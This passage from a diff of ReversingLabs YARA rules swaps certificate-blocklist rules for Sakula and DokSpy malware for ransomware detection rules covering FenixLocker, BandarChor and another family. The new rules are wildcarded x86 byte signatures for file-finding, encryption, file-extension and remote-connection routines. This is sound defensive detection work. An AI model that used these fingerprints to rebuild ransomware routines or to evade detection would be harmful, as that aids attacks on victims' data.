+            ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 DB EB ?? 8D A4 24 ?? ?? ?? ?? EB ?? 8D 49 ??
+            0F B6 83 ?? ?? ?? ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C
+            24 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? 83 C4 ?? 8B C8 8A 10 40 84 D2 75 ?? 8D BC 24 ?? ?? ?? ?? 2B C1 8B F1 4F 8A
+            4F ?? 47 84 C9 75 ?? 8B C8 C1 E9 ?? F3 A5 8B C8 83 E1 ?? 8D 84 24 ?? ?? ?? ?? F3 A4
+            8B C8 8A 10 40 84 D2 75 ?? BF ?? ?? ?? ?? 2B C1 8B F1 4F 8A 4F ?? 47 84 C9 75 ?? 8B
+        }
+		$encrypt_files_p4 = {
+            C8 C1 E9 ?? F3 A5 8B C8 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 E1 ?? 6A ?? 50 F3 A4
+            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ??
+            43 83 C4 ?? 83 FB ?? 0F 8C ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? BF ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 57 68 ?? ?? ?? ??
+            56 FF D3 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 6A ?? 6A ?? 56 68 ?? ?? ?? ??
+            6A ?? 6A ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 89 44 8C ?? 41 89 4C 24 ?? 47 83 C6
+            ?? 83 FF ?? 7E ?? 8B 54 24 ?? 6A ?? 6A ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? ?? ?? 8D 44
+            24 ?? 50 8D 4C 24 ?? 51 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "U-Tech IT service" and pe.signatures [ i ] . serial == "3a:c1:0e:68:f1:ce:51:9e:84:dd:cd:28:b1:1f:a5:42" and 1420156799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_31062E483E0106B18C982F0053185C36 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Fenixlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing Sakula malware."
+		description = "Yara rule that detects FenixLocker ransomware."
 		author = "ReversingLabs"
-		id = "84bce7c1-efba-5a76-8865-dcfcc8e50d41"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "4868ced4-885d-548c-993c-ae25ab188172"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2122-L2138"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.FenixLocker.yara#L1-L143"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e45fc5b4d1b9f5cd35c56aad381e26e30675a9d99747cd318f3c77ea2af0e14a"
+		logic_hash = "72712616df2c73c5c17696a7c5cb93f767910acf5f49cda27373fccfa29c5a4d"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "FenixLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 68 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8B F1 E8 ?? ?? ?? ?? 83 C4
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 8D 85 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5E 8B 4D ?? 33 CD E8 ?? ??
+            ?? ?? 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 33 C0 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50
+            FF B5 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ??
+            ?? ?? 50 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 46 ?? 50 89 85 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            85 C0 0F 84 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B F8
+            6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 7E ?? ?? 72 ?? 8B 36 FF B5 ?? ?? ?? ?? 56 57 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 50 57 6A ?? 6A ?? 6A ?? FF
+            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
+            E5 5D C3 8B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 01 8B C7 8B 4D ?? 5F 33 CD 5E E8 ??
+            ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_2 = {
+            B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75
+            ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ??
+            F6 85 ?? ?? ?? ?? ?? 8D 55 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ??
+            8B F8 C6 45 ?? ?? 8B 4D ?? 8B 55 ?? 41 3B D1 77 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B 55
+            ?? 8B 4D ?? 4A 8B 45 ?? 23 CA 03 C1 89 4D ?? 8B 4D ?? 23 D0 83 3C 91 ?? 8D 34 95 ??
+            ?? ?? ?? 75 ?? 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 89 04 31 8B 4D ?? 8B 0C 31 85
+            C9 74 ?? 57 E8 ?? ?? ?? ?? FF 45 ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40
+            3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B
+            C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83
+            C4 ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45
+            ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ??
+            ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F
+            87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? 8B B5 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 85 F6 0F 8E ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ??
+            ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ??
+            0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
+            ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ??
+            ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ??
+            72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F
+            83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 8B 51 ?? 83 CA ?? 8B C2 83 C8 ?? 83 79 ??
+            ?? 0F 45 C2 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 57 FF
+            15 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ??
+            ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_3 = {
+            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? ?? 83 C4
+            ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ??
+            72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F
+            82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 83 FE ?? 0F
+            84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? B8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? 8A 11 3A 10 75 ?? 84 D2 74 ?? 8A 51 ?? 3A 50 ?? 75 ?? 83 C1 ??
+            83 C0 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ??
+            8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ??
+            ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ??
+            8D 4D ?? 0F 43 4D ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 7E ?? 83 7D ?? ?? 8D 4D ?? 8D
+            45 ?? 0F 43 4D ?? 83 7D ?? ?? 51 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
+            46 EB ?? 85 F6 75 ?? 83 F8 ?? B8 ?? ?? ?? ?? 0F 45 F0 89 B5 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 40 3D ?? ?? ??
+            ?? 72 ?? F6 C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B
+            C8 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? E8
+        }
+		$encrypt_files_4 = {
+            8B BD ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 85 F6 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45
+            ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72
+            ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B 40 ??
+            F6 84 05 ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ??
+            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? 8B 40 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? 6A ?? 50 E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D
+            41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83
+            7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ??
+            E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50
+        }
+		$encrypt_files_5 = {
+            FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ??
+            ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ??
+            ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
+            E5 5D C3 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ??
+            ?? 83 C4 ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF
+            B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? C7
+            45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ??
+            ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8D 4D ?? 0F 43 4D ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 7E ?? 83 7D ?? ?? 8D 4D ?? 8D 45 ?? 0F 43 4D ?? 83 7D ?? ?? 51 0F 43 45 ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 46 89 B5 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ??
+            40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 0F 82 ?? ?? ??
+            ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? E9
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MICRO DIGITAL INC." and pe.signatures [ i ] . serial == "31:06:2e:48:3e:01:06:b1:8c:98:2f:00:53:18:5c:36" and 1332287999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $encrypt_files_1 and $encrypt_files_2 and $encrypt_files_3 ) or ( $encrypt_files_1 and $encrypt_files_4 and $encrypt_files_5 )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_20D0Ee42Fc901E6B3A8Fefe8C1E6087A : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Bandarchor : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing Sakula malware."
+		description = "Yara rule that detects BandarChor ransomware."
 		author = "ReversingLabs"
-		id = "ba37919a-584b-5ff7-b4d5-5b711cc87b1f"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "c645a081-7ff6-58fc-af8e-55f43f56d0ea"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2140-L2156"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BandarChor.yara#L1-L97"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2225302de1e8fe9f2ad064e19b2b1d9faf90c7cafbebff6ddd0921bf57c5f9e6"
+		logic_hash = "1c0c33ef7de089fc7ed6b364c7693499d1a93f79a48d6f2a5c375e47aea176bc"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BandarChor"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SJ SYSTEM" and pe.signatures [ i ] . serial == "20:d0:ee:42:fc:90:1e:6b:3a:8f:ef:e8:c1:e6:08:7a" and 1391299199 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_127251B32B9A50Bd : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing OSX DokSpy backdoor."
-		author = "ReversingLabs"
-		id = "3581085c-a6e7-571f-8253-f8d9e90e78fc"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2158-L2174"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8552ce9e9ab8d6b1025ab3c6e7b2485ef855236114c426475fde0b5f2e231ec9"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$file_extensions_1 = {
+            55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 F9 51 53 89 55 ?? 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? 8B 95 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 85 F9 00 00 00 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B C3 E8 4F FE FF FF E9 ?? ?? ?? ?? 8D 95
+        }
+		$file_extensions_2 = {
+            ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
